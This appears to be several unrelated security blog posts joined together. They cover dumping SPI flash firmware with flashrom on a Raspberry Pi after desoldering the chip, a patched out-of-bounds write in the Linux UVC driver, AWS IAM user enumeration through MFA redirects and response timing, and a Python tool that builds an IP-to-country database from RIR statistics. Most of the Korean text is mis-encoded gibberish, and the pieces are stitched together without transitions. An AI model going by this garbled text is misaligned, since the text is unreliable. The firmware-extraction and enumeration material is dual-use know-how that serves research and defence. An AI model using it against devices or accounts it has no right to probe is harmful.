ํ์ํ ์ฅ๋น์ ๋๊ตฌ์ ๋ชฉ๋ก์ ๋ค์๊ณผ ๊ฐ์ต๋๋ค. ๐ธ
Flashrom์ flash chip์ ๋ฐ์ดํฐ์ ์ด๋ฏธ์ง๋ฅผ ํ๋์ํ ์ ์๋ ๊ฐ๋ฐ ๋๊ตฌ์ ๋๋ค.
detecting, reading, writing, verifying, erasing์ ๊ธฐ๋ฅ์ ์ ๊ณตํ๊ธฐ ๋๋ฌธ์,
์๋ฒ ๋๋ ํดํน์์๋ ์ด ๋๊ตฌ๋ฅผ ํตํด flash memory ์์ ์๋ ํ์จ์ด๋ฅผ ์ญ์ผ๋ก ์ถ์ถํ ์ ์์ต๋๋ค.
๊ด๋ จ Dependency๋ฅผ ์ค์นํ๊ณ , meson์ผ๋ก Raspberry Pi์์ ์ค์น๋ฅผ ์งํํฉ๋๋ค. ๐
Raspberry Pi๋ 64 Bit๋ก ์ค์นํ์ฌ ์ค๋นํฉ๋๋ค.
sudo apt-get install -y gcc meson ninja-build pkg-config python3-sphinx libcmocka-dev libpci-dev libusb-1.0-0-dev libftdi1-dev libjaylink-dev libssl-devgit clone https://github.com/flashrom/flashrommeson setup builddirmeson compile -C builddirmeson test -C builddirmeson install -C builddir
flashrom์ผ๋ก Chip์ ์ถ์ถํ ๋, Chip์ด ๋ณด๋์ ์ฐ๊ฒฐ๋ ์ํ๋ก Dump๋ฅผ ์งํํ๋ฉด, ์ถ์ถ์ด ์ํํ๊ฒ ๋์ง ์์ ๊ฐ๋ฅ์ฑ์ด ๋์ต๋๋ค. ๐ป
์ด์ ๋ ์ฅ๋น์ ๋ณด๋์ ๋ฐ๋ผ ๋ค๋ฅด๊ฒ ์ง๋ง, Raspberry Pi๊ฐ Chip์ผ๋ก ๊ณต๊ธ ๋์ด์ผ ํ ์ ์์ด ๋ณด๋ ์ ์ฒด๋ก ๊ณต๊ธ๋์ด ๋ณด๋์ ๋ ธ์ด์ฆ ์ ํธ๊ฐ ์ถ์ถ์ ๋ฐฉํดํ๊ฑฐ๋ ๋ฌธ์ ๊ฐ ๋ ๊ฐ๋ฅ์ฑ์ด ๋์ต๋๋ค.
์๋๋ Raspberry Pi์ VCC, GND ํ์ Flash Memory Chip์ ํด๋น ํ์ ์ ์ดํ๋ ๊ฒ ๋ง์ผ๋ก ๋ณด๋์ ์ ์์ด ๋ค์ด์ค๋ ๊ฒ์ ํ์ธํ ์ ์๋ ์ฌ์ง์ ๋๋ค.
๊ทธ๋ ๊ธฐ ๋๋ฌธ์ ๋ณด๋์์ Chip Off๋ฅผ ํ์ฌ Chip๋ง์ ์ฐ๊ฒฐํ๋ ๊ฒ์ด ์ข์ต๋๋ค.
์ดํ๊ธฐ๋ฅผ ์ด์ฉํ์ฌ ๋๋ฉ์ ๋ น์ด๊ณ Chip Off๋ฅผ ์ค์ํฉ๋๋ค.
์ด ๊ณผ์ ์์ ๋ณด๋๊ฐ ๋ง๊ฐ์ง ์ํ์ด ๋งค์ฐ ๋๊ธฐ์, ์ฃผ์ํด์ Chip Off๋ฅผ ํฉ๋๋ค.
๋ณดํต ์ ์ ๋ ฅ IoT ๋ฐ ์๋ฒ ๋๋ ์ฅ๋น์ ๋ค์ด๊ฐ๋ Flash memory๋ SPI ํต์ ์ ์ฌ์ฉํ๋ 8 pin chip์ธ ๊ฒฝ์ฐ๊ฐ ๋ง์ต๋๋ค.
chip ๋ชจ๋ธ๊ณผ vendor๋ง๋ค ๊ฐ pin์ ์ธ๋ถ ์ญํ ์ ์ฐจ์ด๊ฐ ์์ ์๋ ์์ง๋ง, ๋๋ถ๋ถ 8 pin์ ์ญํ ์ ๊ฐ์ผ๋ฏ๋ก ํด๋น ์นฉ์ Datasheet๋ฅผ ํ๋ณดํ์ฌ Pin out์ ํ์ธํฉ๋๋ค.
Datasheet์๋ ์ ์กฐ์ฌ๊ฐ ํด๋น Chip์ ์ค๋ช ๊ณผ ์ฌ์ฉ์ ์ํ ๋ชจ๋ ์ ๋ณด๋ฅผ ์ ์ด ๋จ์ผ๋ ๊ผญ ํ์ธํฉ๋๋ค!
Flash Memory์ ๊ฐ 8 pin์ ์ญํ ์ ๋ค์๊ณผ ๊ฐ์ต๋๋ค. ๐
Raspberry Pi์ ์กด์ฌํ๋ GPIO ํ๊ณผ Flash Memory์ Pin์ ์ฐ๊ฒฐํฉ๋๋ค.
Flash Memory์์ ์ฌ์ฉํ๋ VCC, Hold, WP ํ์ VCC ์ ์์ ์ฌ์ฉํ๋ ํ์ ๋๋ค.
Raspberry Pi GPIO ํ์๋ VCC ํ์ด ๋ถ์กฑํ๋ฏ๋ก ๋ธ๋ ๋ ๋ณด๋ ๋ฑ์ผ๋ก VCC ์ ํธ๋ฅผ ๊ณต๊ธํ๋ ๊ฒ์ด ํธํฉ๋๋ค.
IC Test Hook Chip ์ฅ๋น๋ฅผ ์ด์ฉํด์ ๊ฐ ํ์ ์ฐ๊ฒฐํ๊ณ ์ถ์ถ์ ์งํํฉ๋๋ค.
์์ Clip์ผ์๋ก ์ฐ๊ฒฐ์ด ์ฝ๊ธฐ์ ์์ Test Clip์ผ๋ก ์ค๋นํ๋ฉด ์ข์ต๋๋ค.
์ฐ๊ฒฐ์ด ์๋ฃ๋๋ฉด Raspberry Pi ํฐ๋ฏธ๋์์ ์๋ ๋ช ๋ น์ด๋ฅผ ํตํด์ ์ถ์ถ์ ์งํํฉ๋๋ค. ๐
# ์ฐ๊ฒฐ ํ์ธ ๋ฐ Chip ๋ช
ํ์ธsudo flashrom -p linux_spi:dev=/dev/spidev0.0,spispeed=2000 -V# ์ถ์ถsudo flashrom -p linux_spi:dev=/dev/spidev0.0 -r [์ ์ฅํ์ผ๋ช
]sudo flashrom -p linux_spi:dev=/dev/spidev0.0 -c [Chip๋ช
] -r [์ ์ฅํ์ผ๋ช
]
flashrom์ ์ง์ํ๋ Chip์ธ ๊ฒฝ์ฐ ๋ฐ๋ก ์ถ์ถ์ด ์งํ๋ฉ๋๋ค.
๊ทธ๋ฌ๋ ์ง์ํ์ง ์๋ Chip์ธ ๊ฒฝ์ฐ์๋ flashchips.h
, flashchips.c
์ ํ์ธํ๊ณ ์กด์ฌํ์ง ์๋ ๊ฒฝ์ฐ, ์ง์ ์ถ๊ฐํ์ฌ ๋น๋ํ๋ฉด ์ถ์ถ์ด ๊ฐ๋ฅํฉ๋๋ค.
Datasheet๋ฅผ ์ฐธ๊ณ ํ์ฌ ์๋ flashchips.c ํ์ผ์ ์ถ๊ฐํ๋ ค๋ Chip์ ์ ๋ณด๋ฅผ ๊ธฐ์ ํฉ๋๋ค.
const struct flashchip flashchips[] = {/* * .vendor= Vendor name * .name= Chip name * .bustype= Supported flash bus types (Parallel, LPC...) * .manufacture_id= Manufacturer chip ID * .model_id= Model chip ID * .total_size= Total size in (binary) kbytes * .page_size= Page or eraseblock(?) size in bytes * .tested= Test status * .probe= Probe function * .probe_timing= Probe function delay * .block_erasers[]= Array of erase layouts and erase functions * { *.eraseblocks[]= Array of { blocksize, blockcount } *.block_erase= Block erase function * } * .printlock= Chip lock status function * .unlock= Chip unlock function * .write= Chip write function * .read= Chip read function * .voltage= Voltage range in millivolt */
์ ๊ณผ์ ์ผ๋ก Flash memory dump๋ฅผ ์ค์ํ์ฌ Chip ๋ด์ ์กด์ฌํ๋ Firmware๋ฅผ ์ถ์ถํ ์ ์์ต๋๋ค!
Flash Memory Chip off ์ดํ์๋ Chip์ด ๋จ์ด์ ธ ์๊ธฐ์ ์ฅ๋น๋ฅผ ์ฐ์ง ๋ชปํฉ๋๋คโฆ
ํ์ง๋ง! ์กฐ๋ฆฝ์ ๋ถํด์ ์ญ์์ ๋๋ค!
Flash Memory Chip์ ๋ค์ ์(!) Resolderingํ๋ฉด ์ฅ๋น๋ฅผ ๋ค์ ์ฌ์ฉํ ์ ์์ต๋๋ค!
ํ์จ์ด๋ ํ๋ํ๊ณ ์ฅ๋น๋ ๋ค์ ์ฌ์ฉํ ์ ์๋ ๋ ๋ง๋ฆฌ ํ ๋ผ๋ฅผ ๋ชจ๋ ์ก์๋ด ์๋ค! ๐คฅ
๋ค์์๋ ์๋ฒ ๋๋ ํดํน์์ ์์ฃผ ์๋๋๋ UART/JTAG ๋๋ฒ๊น ํฌํธ ์ฐ๊ฒฐ์ ๋ํด์ ๋ค๋ค๋ณด๊ฒ ์ต๋๋ค!
๊ฐ์ฌํฉ๋๋ค! ๐๐ป
์ด ์ทจ์ฝ์ ์ UVC (USB Video Class) ๋๋ผ์ด๋ฒ์ uvc_parse_format
ํจ์์์ ๋ฐ์ํฉ๋๋ค. ๋ฌธ์ ๋ ํ๋ ์ ๋์คํฌ๋ฆฝํฐ๋ฅผ ํ์ฑํ ๋, ์ ์๋์ง ์์ ํ๋ ์ ํ์
(์, UVC_VS_UNDEFINED, ์ค์ ์ฝ๋์์๋ ftype
์ด 0์ธ ๊ฒฝ์ฐ)์ ์ ๋๋ก ์ฒ๋ฆฌํ์ง ์์ Out-Of-Bounds Write๊ฐ ๋ฐ์ํ ์ ์๋ค๋ ์ ์
๋๋ค.
ํจ์น ์ ์ฝ๋
ํ๋ ์ ๋์คํฌ๋ฆฝํฐ๋ฅผ ํ์ฑํ๋ while ๋ฃจํ์ ์กฐ๊ฑด์ ๋ค์๊ณผ ๊ฐ์ต๋๋ค:
while (buflen > 2 && buffer[1] == USB_DT_CS_INTERFACE && buffer[2] == ftype) { // ํ๋ ์ ํ์ฑ ์ฒ๋ฆฌ...}
ftype
์ ํ์ฑํ ํ๋ ์์ ํ์
์ ๋ํ๋ด๋ฉฐ, UVC_VS_FRAME_UNCOMPRESSED, UVC_VS_FRAME_FRAME_BASED, UVC_VS_FRAME_MJPEG ๋ฑ์ผ๋ก ์ค์ ๋ฉ๋๋ค. ํน์ ํฌ๋งท(์: DV ํฌ๋งท)์ ๊ฒฝ์ฐ ftype
์ 0์ผ๋ก ์ค์ ํ๋๋ฐ, ์ด๋ ์ค์ ํ๋ ์ ๋์คํฌ๋ฆฝํฐ๊ฐ ์กด์ฌํ์ง ์์์ ์๋ฏธํฉ๋๋ค.
๋ฌธ์ ๋ ๋ง์ฝ ftype
๊ฐ์ด 0(์ฆ, UVC_VS_UNDEFINED)์ด๋ฉด, ์กฐ๊ฑด buffer[2] == 0
์ด ์ฐธ์ด ๋์ด ๋ฃจํ๊ฐ ์คํ๋๊ณ , ๊ณ์ฐ๋ ํ๋ ์ ๋ฒํผ ํฌ๊ธฐ๊ฐ ๋ถ์ ํํด์ง ์ ์์ต๋๋ค.
ํจ์น ์ ์๋ ftype
์ด 0์ธ ์ํฉ์์๋ ๋ฃจํ๊ฐ ์กฐ๊ฑด์ ๋ง๊ฒ ์คํ๋์ด, ํ๋ ์ ๋์คํฌ๋ฆฝํฐ์ ํฌ๊ธฐ๋ ๋ฒํผ ๊ณ์ฐ์ ํฌํจ๋๊ฒ ๋ฉ๋๋ค. ์ด๋ก ์ธํด ์ ์๋์ง ์์ ํ๋ ์ ํ์
์ ๋ํด ์๋ชป๋ ๋ฉ๋ชจ๋ฆฌ ์ ๊ทผ์ด ์ด๋ฃจ์ด์ง๊ณ , ๋ฒํผ์ OOB Write๊ฐ ๋ฐ์ํ ์ํ์ด ์๊น๋๋ค. ์ด ์ทจ์ฝ์ ์ ์
์ฉํ ๊ฒฝ์ฐ, ๊ณต๊ฒฉ์๋ ์ปค๋ ๋ฉ๋ชจ๋ฆฌ๋ฅผ ๋ณ์กฐํ์ฌ ์์คํ
์ ์์ ์ฑ์ ํด์น๊ฑฐ๋, ์ฌ๊ฐํ ๊ฒฝ์ฐ ๊ถํ ์์น ๋ฐ ์๊ฒฉ ์ฝ๋ ์คํ ๋ฑ ์น๋ช
์ ์ธ ๋ณด์ ๋ฌธ์ ๋ฅผ ์ผ์ผํฌ ์ ์์ต๋๋ค.
ํจ์น ํ ์ฝ๋
while ๋ฃจํ์ ์กฐ๊ฑด์ ftype
๊ฐ์ ๋ํ ์ถ๊ฐ ๊ฒ์ฆ(ftype &&
)์ด ๋ค์ด๊ฐ์ต๋๋ค:
while (ftype && buflen > 2 && buffer[1] == USB_DT_CS_INTERFACE && buffer[2] == ftype) { // ํ๋ ์ ํ์ฑ ์ฒ๋ฆฌ...}
์ด๋ก์จ ftype
์ด 0์ธ ๊ฒฝ์ฐ(์ฆ, ์ ์๋์ง ์์ ํ๋ ์ ํ์
)์๋ ๋ฃจํ๊ฐ ์คํ๋์ง ์์, ์๋ชป๋ ํ์ฑ์ ๋ฐฉ์งํฉ๋๋ค.
ํจ์น์์๋ while ๋ฃจํ์ ์กฐ๊ฑด์ ftype
๊ฒ์ฆ์ ์ถ๊ฐํ์ฌ, ftype
๊ฐ์ด 0(์ ์๋์ง ์์ ์ํ)์ธ ๊ฒฝ์ฐ ํ๋ ์ ๋์คํฌ๋ฆฝํฐ ํ์ฑ์ ์์ ๊ฑด๋๋ฐ๋๋ก ์์ ํ์ต๋๋ค. ์ด ๋ณ๊ฒฝ์ ํตํด, ์๋ชป๋ ํ๋ ์ ํ์
(์, UVC_VS_UNDEFINED)์ผ๋ก ์ธํ ๋ฒํผ ํฌ๊ธฐ ๊ณ์ฐ ์ค๋ฅ๊ฐ ๋ฐ์ํ์ง ์๊ณ , ๋ฐ๋ผ์ ๋ฒํผ์ OOB Write๋ฅผ ์๋ํ๋ ์ํฉ์ ๋ฏธ์ฐ์ ๋ฐฉ์งํ ์ ์์ต๋๋ค. ๊ฒฐ๊ณผ์ ์ผ๋ก, ๋ฉ๋ชจ๋ฆฌ ์ค์ผ ๋ฐ ์
์์ ์ฝ๋ ์คํ์ ์ํ์ด ํฌ๊ฒ ๊ฐ์ํฉ๋๋ค.
AWS IAM(Identity and Access Management)์ AWS ๋ฆฌ์์ค์ ๋ํ ์ก์ธ์ค๋ฅผ ์์ ํ๊ฒ ๊ด๋ฆฌํ ์ ์๋ ์น ์๋น์ค์ ๋๋ค.
IAM ์ฝ์ ๋ก๊ทธ์ธ์ด ํ์ฑํ๋ ๋ชจ๋ ์ฌ์ฉ์์ ๋ํด ์กด์ฌ ์ฌ๋ถ๋ฅผ ํ์ธํ ์ ์๋ ๋ ๊ฐ์ง ์ทจ์ฝ์ ์ด ๋ฐ๊ฒฌ๋์์ต๋๋ค.
AWS IAM ์ฌ์ฉ์๊ฐ MFA(๋ค์ค ์ธ์ฆ)๋ฅผ ํ์ฑํํ์ ๊ฒฝ์ฐ, ๋ก๊ทธ์ธ ํ๋ฆ์ ์ฐจ์ด๋ก ์ธํด ํด๋น ์ฌ์ฉ์์ ์กด์ฌ ์ฌ๋ถ๋ฅผ ํ์ธํ ์ ์์ต๋๋ค.
IAM ์ฌ์ฉ์๊ฐ AWS ์น ์ฝ์์ ๋ก๊ทธ์ธํ๋ฉด ๋ค์๊ณผ ๊ฐ์ด ๋์ํฉ๋๋ค.
์ฌ์ฉ์๊ฐ ์กด์ฌํ๋ฉด MFA ์ฝ๋ ์ ๋ ฅ ํ์ด์ง๋ก ์ด๋ํ๊ณ , ์กด์ฌํ์ง ์์ผ๋ฉด ์ค๋ฅ ๋ฉ์์ง๊ฐ ํ์๋ฉ๋๋ค.
์ฌ์ฉ์๊ฐ ์กด์ฌํ๋ฉด ๋น๋ฐ๋ฒํธ๊ฐ ํ๋ ค๋ MFA ์ฝ๋ ์ ๋ ฅ ํ์ด์ง๋ก ์ด๋ํ๊ธฐ ๋๋ฌธ์, IAM ์ฌ์ฉ์์ ์กด์ฌ ์ฌ๋ถ๋ฅผ ์ฝ๊ฒ ํ์ธํ ์ ์์ต๋๋ค.
ํด๋น ์ทจ์ฝ์ ์ AWS์์ ํ์ฉ ๊ฐ๋ฅํ ์ํ(Accepted Risk)์ผ๋ก ํ๋จํด, CVE๊ฐ ํ ๋น๋์ง ์์์ต๋๋ค.
MFA๋ฅผ ์ฌ์ฉํ์ง ์๋ IAM ์ฌ์ฉ์๋ Timing Attack์ ํตํด User Enumeration ์ทจ์ฝ์ ์ ํธ๋ฆฌ๊ฑฐ ํ ์ ์์ต๋๋ค.
MFA๊ฐ ๋นํ์ฑํ๋ IAM ์ฌ์ฉ์๊ฐ ๋ก๊ทธ์ธํ๋ฉด ๋ค์๊ณผ ๊ฐ์ด ๋์ํฉ๋๋ค.
์ด๋, ์๋ฒ ์๋ต ์๊ฐ์ ์ธก์ ๊ฐ๋ฅํ ์ฐจ์ด๊ฐ ๋ฐ์ํ๋ค๋ฉด, ๊ณต๊ฒฉ์๋ ์ฌ๋ฌ ์ฌ์ฉ์๋ช ์ ์ ๋ ฅํ๊ณ ์๋ต ์๊ฐ์ ๋ถ์ํ์ฌ ์ฌ์ฉ์ ์กด์ฌ ์ฌ๋ถ๋ฅผ ์ถ์ธกํ ์ ์์ต๋๋ค.
Burp Suite๋ฅผ ํตํด ํ ์คํธํ ๊ฒฐ๊ณผ, ์ค์ ์กด์ฌํ๋ IAM ์ฌ์ฉ์(bfme-console)์ ๊ฒฝ์ฐ, ์๋ต ์๊ฐ์ด ์ฝ 100ms ์ฆ๊ฐํด ์ค์ ์ฌ์ฉ์ ์กด์ฌ ์ฌ๋ถ๋ฅผ ์์๋ผ ์ ์์ต๋๋ค.
ํด๋น ์ทจ์ฝ์ ์ CVE-2025-0693 ํ ๋น๋ฐ์์ผ๋ฉฐ, AWS๋ ๋ชจ๋ ์ธ์ฆ ์คํจ ์๋๋ฆฌ์ค์์ ์๋ต ์๊ฐ์ ๋์ผํ๊ฒ ์ง์ฐ์ํค๋ ๋ฐฉ์์ผ๋ก ํจ์น๋ฅผ ์งํํ์ต๋๋ค.
Hello, Iโm empty ๐. In the field of security, we often need to analyze suspicious IP addresses. When using various IP lookup services, the verdict on whether an IP is malicious may differ, but โcountry information, ASN information, ISP informationโ are consistently provided. I became curious about where and how this data is obtained and served, so I decided to investigate.
Broadly speaking, IP information can be retrieved via:
Each method offers different speeds, accuracy, and freshness of data, so itโs important to choose the method that best fits your needs.
Some services provide reputation (malicious or fraud-related) information, others provide port scanning results, and others geographic location information. However, country, ASN, and ISP name are virtually always provided, no matter which service you use.
Type of Service | Examples |
---|---|
Reputation Check | Virustotal, AbuseIPDB |
Port Scanner | Censys, Shodan, Criminal IP |
IP Geolocation | MaxMind, ipinfo, IP2Location, IPQualityScore |
Although the data scope and content may differ subtly by service, almost every IP lookup service commonly returns the IPโs country, ASN, and ISP name. Personally, I often use the ipinfo
service via a simple curl
command in the terminal.
Interestingly, different services can display different countries or location info for the exact same IP. For example, when looking up an IP address from the Hong Kong-based cloud provider SonderCloud Limited on VirusTotal, it shows as being in the United States, while ipinfo displays Hong Kong.
These discrepancies arise from a range of factors. Even if a company is registered in Hong Kong, its actual server could be physically located in the US, or vice versa. Additionally, some services base the IPโs country not on the physical location but on the country in which the business is registered, or on the IP block assignment recorded by a Regional Internet Registry (RIR).
On top of that, the update frequency and data collection methods vary by service, so even the same IP may give different results from different sources.
Here, โdatabaseโ doesnโt refer to applications like MySQL or PostgreSQL; rather, it refers to a prestructured โIP information database fileโ that lists IP addresses along with details such as country and ASN. These can be implemented in various formatsโlike JSON, CSV, or MMDBโand are commonly used in .mmdb
format.
MMDB is a file format developed and published by MaxMind. Because itโs an open format, MaxMind and many other IP information services provide their IP database files in .mmdb
format. Many security devices that require real-time performance load the mmdb file into memory for super-fast lookups (on the order of less than 0.00n seconds per IP).
import maxminddbip = "8.8.8.8"with maxminddb.open_database("country_asn.mmdb") as reader: result = reader.get(ip) print(result)
{ "as_domain": "google.com", "as_name": "Google LLC", "asn": "AS15169", "continent": "NA", "continent_name": "North America", "country": "US", "country_name": "United States"}
However, because data such as ASN can change daily, you need to periodically update your local database file to stay current.
Lastly, thereโs the Whois protocol. When you query an IP address using Whois, it sends a request to the appropriate RIRโs Whois server, which then returns detailed information about the IP. Since the data is maintained directly by an RIR, itโs typically highly accurate.
Windows doesnโt include a built-in Whois command, so I sometimes use the NirSoft tool IPNetInfo, which is particularly handy for bulk lookups.
Because Whois is a query-based method that communicates with a remote server, network latency is inevitable; and if the server is under heavy load or the queries are excessive, your requests might get blocked. For instance, the IPNetInfo product page states:
Sometimes the ARIN Whois server may be down and fail to respond to IPNetInfoโs WHOIS queries, which prevents IPNetInfo from retrieving IP addresses. If this happens, try again later.
Below is a summary of each method:
Method | Freshness | Accuracy | Speed | Notes |
---|---|---|---|---|
1) External Service | ๐ (frequently updated) | ๐ (various sources) | ๐ (network latency) | - Many services are updated in real-time or very often, so you can get the latest data - However, there may be network delays depending on traffic or server conditions - Excessive queries or poor server conditions can cause slow or blocked responses |
2) Build Your Own DB | ๐ (periodic updates) | ๐ค (aggregated data) | ๐ (local lookups) | - Very fast since youโre querying locally - If the update cycle is too long, freshness and accuracy can suffer |
3) Whois Server | ๐ (RIR data) | ๐ (official info) | ๐ (network latency) | - Highly accurate, since the info comes directly from RIRs - Excessive queries or server issues can cause slow or blocked responses |
Therefore, if you frequently query IPs and need quick responses in an environment where external internet access might not be possible, building your own local country database is the best approach. Below, Iโll show you how to collect source data from RIRs and build an IP-country information database in your local environment.
The public IP addresses we useโaround 3.7 billionโare limited resources. To manage them effectively, a central coordinating body is required. That role is filled by ICANN (Internet Corporation for Assigned Names and Numbers) in the United States.
ICANN manages top-level internet resources like IP addresses, DNS, and protocol numbers. Because ICANN canโt manage all IP addresses directly, the IANA (Internet Assigned Numbers Authority)โan organization under ICANNโallocates IP address ranges to RIRs (Regional Internet Registries) by region.
There are currently five RIRs: ARIN (North America), RIPENCC (Europe), LACNIC (Latin America), AFRINIC (Africa), and APNIC (Asia). Of these, LACNIC and APNIC maintain NIRs (National Internet Registries) to further subdivide responsibilities at a national level:
In other words, IP addresses are managed in this chain: ICANN โ IANA โ RIR โ NIR โ ISP.
Each RIR routinely uploads statistics in a specific format to a specific path (named stats
) on their FTP server, at a specific time (23:59:59), under a specific file name.
You can learn more about file format details by checking out APNICโs RIR statistics exchange format.
Now that we know the data sources (RIR FTP servers) and the file formats, we can build a tool. For example, you could:
delegated-{REGISTRY}-latest
file from every RIRโs FTP serverHereโs some sample code:
# builtin modulesimport osimport ipaddressimport asynciofrom datetime import datetime# install modulesimport aiohttpintervals = []today = datetime.now().strftime("%Y%m%d")RIR_URLS = [ "https://ftp.apnic.net/stats/apnic/delegated-apnic-extended-latest", "https://ftp.arin.net/pub/stats/arin/delegated-arin-extended-latest", "https://ftp.lacnic.net/pub/stats/lacnic/delegated-lacnic-extended-latest", "https://ftp.ripe.net/pub/stats/ripencc/delegated-ripencc-extended-latest", "https://ftp.afrinic.net/stats/afrinic/delegated-afrinic-extended-latest",]MAPPING_DATABASE = f"./rsc/{today}_mapping.db"# Downloadasync def fetch(session, url): async with session.get(url) as response: print(f"[{response.status}] - {url}") content = await response.read() filename = url.split("/")[-1] filepath = f"./rsc/{today}_{filename}" with open(filepath, "wb") as f: f.write(content) return# Download coroutineasync def download(): async with aiohttp.ClientSession() as session: await asyncio.gather(*(fetch(session, url) for url in RIR_URLS)) print("Download Complete") return# Load databasedef init_database(): if not os.path.exists("./rsc"): os.mkdir("./rsc") # If the IP database set exists, load it into memory if os.path.exists(MAPPING_DATABASE): print("Databse load") with open(MAPPING_DATABASE, "r") as f: for line in f: start_ip, end_ip, country = line.strip().split(",") intervals.append((int(start_ip), int(end_ip), country)) return # If it doesn't exist, download, process, and save asyncio.run(download()) for rir_url in RIR_URLS: filename = rir_url.split("/")[-1] filepath = f"./rsc/{today}_{filename}" with open(filepath, "r") as f: for line in f: line = line.strip().split("|") if len(line) != 8 or line[2] != "ipv4": continue country = line[1] ip = line[3] ip_range = line[4] start_ip = int(ipaddress.IPv4Address(ip)) end_ip = (int(ipaddress.IPv4Address(ip)) + int(ip_range)) - 1 result = (start_ip, end_ip, country) intervals.append(result) # Save the data intervals.sort(key=lambda x: x[0]) with open(MAPPING_DATABASE, "w") as f: for interval in intervals: line = f"{interval[0]},{interval[1]},{interval[2]}" f.write(line + "\n") print("Databse load") return# Searchdef search(search_ip): result = None try: search_ip = int(ipaddress.IPv4Address(search_ip)) except: return None left, right = 0, len(intervals) - 1 while left <= right: mid = (left + right) // 2 start_ip, end_ip, country = intervals[mid] if start_ip <= search_ip <= end_ip: result = country break elif start_ip > search_ip: right = mid - 1 else: left = mid + 1 return resultdef main(): init_database() while True: ipv4 = input("Insert IPv4: ") r = search(ipv4) print(r)if __name__ == "__main__": main()
Once downloaded from the RIRs, youโll see that around 253,714 IP ranges (covering the roughly 3.7 billion public IPs) exist. That effectively means you can figure out the country of any public IP. Interestingly, the program I wrote above seems to perform 30โ250 times faster lookups than queries using .mmdb
.
My guess is that MMDB might have more granularly subdivided IP ranges and also stores additional data (like ASN), so that could explain the difference.
RIR data only contains information such as which IP addresses were assigned (e.g., IP block allocations). It doesnโt tell you which ASNs those IPs belong to. To figure that out, youโd need to collect data from BGP (Border Gateway Protocol) tables. Because this post has already grown quite long, Iโll continue this topic in a future article.
For sanityโs sake, I personally recommend regularly downloading an .mmdb
file from ipinfo or another provider, if feasible.
์๋ ํ์ธ์. empty์ ๋๋ค๐. ๋ณด์ ์ ๋ฌด๋ฅผ ํ๋ค ๋ณด๋ฉด ์์ฌ์ค๋ฌ์ด IP๋ฅผ ๋ถ์ํ๋ ์ผ์ด ์ฆ์๋ฐ์. ์ฌ๋ฌ IP ์กฐํ ์๋น์ค๋ฅผ ์ด์ฉํด ๋ณด๋ฉด ์ ์ฑ ์ฌ๋ถ์ ๊ฒฐ๊ณผ๋ ์๋ก ๋ค๋ฅผ ์ ์์ผ๋ โ๊ตญ๊ฐ ์ ๋ณด, ASN ์ ๋ณด, ISP ์ ๋ณดโ๋ ๋ชจ๋ ๋์ผํ๊ฒ ์ ๊ณต๋ฉ๋๋ค. ์ด๋ฌํ ๋ฐ์ดํฐ๋ ์ด๋์ ์ด๋ป๊ฒ ๊ตฌํด์ ์ ๊ณตํด ์ฃผ๋์ง ๊ถ๊ธ์ฆ์ด ์๊ฒจ ์ง์ ์์๋ดค์ต๋๋ค.
IP ์ ๋ณด๋ฅผ ์กฐํํ๋ ๋ฐฉ์์ ํฌ๊ฒ IP ์ ๋ณด ์กฐํ ์๋น์ค, ๋ฐ์ดํฐ๋ฒ ์ด์ค ์กฐํ, Whois ํ๋กํ ์ฝ ์ธ ๊ฐ์ง๋ก ๊ตฌ๋ถํ ์ ์์ต๋๋ค. ๊ฐ๊ฐ์ ๋ฐฉ๋ฒ์ ์๋, ์ ํ์ฑ, ์ต์ ์ฑ์ด ๋ค๋ฅด๋ฏ๋ก ์ํฉ์ ๋ง์ถฐ ์ ํํด์ผ ํฉ๋๋ค.
IP ์ ๋ณด๋ฅผ ์กฐํํ๋ ์๋น์ค๋ค์ ์ ์ฑ ์ฌ๋ถ๋ ์ฌ๊ธฐ ๊ด๋ จ ํํ ์ ๋ณด๋ฅผ, ์ผ๋ถ๋ ํฌํธ ์ค์บ ๊ฒฐ๊ณผ๋ฅผ, ๋ ์ผ๋ถ๋ ์ง๋ฆฌ์ ์์น ์ ๋ณด๋ฅผ ์ ๊ณตํ๋ ๋ฑ์ ์ฐจ์ด๊ฐ ์์ต๋๋ค. ํ์ง๋ง ๊ณตํต์ ์ผ๋ก ๊ตญ๊ฐ, ASN, ISP ๋ช ๋ฑ์ ๊ธฐ๋ณธ ์ ๋ณด๋ ๋์ผํ๊ฒ ์ ๊ณต๋ฉ๋๋ค.
์๋น์ค ์ข ๋ฅ | ์ฃผ์ ์๋น์ค ๋ช |
---|---|
ํํ ์กฐํ | Virustotal, AbuseIPDB |
ํฌํธ ์ค์บ๋ | Censys, Shodan, Criminal IP |
IP ์ง๋ฆฌ์ ๋ณด | MaxMind, ipinfo, IP2Location, IPQualityScore |
์๋น์ค ์ข ๋ฅ์ ๋ฐ๋ผ ์ ๊ณต๋๋ ๋ฐ์ดํฐ ๋ฒ์์ ๋ด์ฉ์๋ ๋ฏธ๋ฌํ ์ฐจ์ด๊ฐ ์์ผ๋, ๊ฑฐ์ ๋ชจ๋ IP ์กฐํ ์๋น์ค๋ ๊ณตํต์ ์ผ๋ก ๊ตญ๊ฐ, ASN, ISP ๋ช ์ ๋๋ ์ ๊ณตํฉ๋๋ค. ๊ฐ์ธ์ ์ผ๋ก๋ ํฐ๋ฏธ๋์์ curl ๋ช ๋ น์ด๋ก ๊ฐ๋จํ ์กฐํํ ์ ์๋ ipinfo ์๋น์ค๋ฅผ ์์ฃผ ํ์ฉํฉ๋๋ค.
ํฅ๋ฏธ๋ก์ด ์ ์ ์๋น์ค๋ณ๋ก IP ๊ตญ๊ฐ ์ ๋ณด๋ ์์น ์ ๋ณด๊ฐ ์๋ก ๋ค๋ฅด๊ฒ ํ์๋ ๋๊ฐ ์ข ์ข ์๋ค๋ ๊ฒ์ ๋๋ค. ์๋ฅผ ๋ค์ด, ํ์ฝฉ์ ํด๋ผ์ฐ๋ ์ ์ฒด SonderCloud Limited IP ์ฃผ์๋ฅผ VirusTotal์ ์กฐํํ ๊ฒฝ์ฐ ๋ฏธ๊ตญ์ผ๋ก ํ์๋๊ณ , ipinfo์์๋ ํ์ฝฉ์ผ๋ก ํ์๋๊ณ ์์ต๋๋ค.
